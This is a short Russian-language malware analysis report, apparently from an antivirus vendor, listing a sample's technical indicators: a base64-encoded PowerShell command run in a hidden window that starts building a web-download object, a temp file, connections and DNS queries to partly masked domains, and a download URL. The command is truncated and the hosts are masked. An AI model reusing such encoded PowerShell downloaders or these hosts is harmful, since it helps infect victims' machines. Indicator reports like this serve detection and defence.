Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABtAEcAWgBBAEEAWgA0AFEAPQAoACcAegBHAFEAWABBACcAKwAnAEEAJwArACcAQQBEACcAKQA7ACQAegA0AGsAQQBEAEEAMQBBAD0AJgAoACcAbgBlAHcALQBvAGIAJwArACcAagBlAGMAJwArACcAdAAnACkAIABOAGUAdAAuAFcAZQBiAEMAbABpAG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1540
- %TEMP%\1193672.cvr
- 'ar##sms.ir':80
- 'do###eninja.in':80
- http://do###eninja.in/wp-includes/KMg/
- DNS ASK pl#######nslidingdoorrepair.net
- DNS ASK ge###########abetes.eastus.cloudapp.azure.com
- DNS ASK ur######vokat-mogilev.by
- DNS ASK ar##sms.ir
- DNS ASK do###eninja.in
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABtAEcAWgBBAEEAWgA0AFEAPQAoACcAegBHAFEAWABBACcAKwAnAEEAJwArACcAQQBEACcAKQA7ACQAegA0AGsAQQBEAEEAMQBBAD0AJgAoACcAbgBlAHcALQBvAGIAJwArACcAagBlAGMAJwArACcAdAAnACkAIABOAGUAdAAuAFcAZQBiAEMAbABpAG...' (со скрытым окном)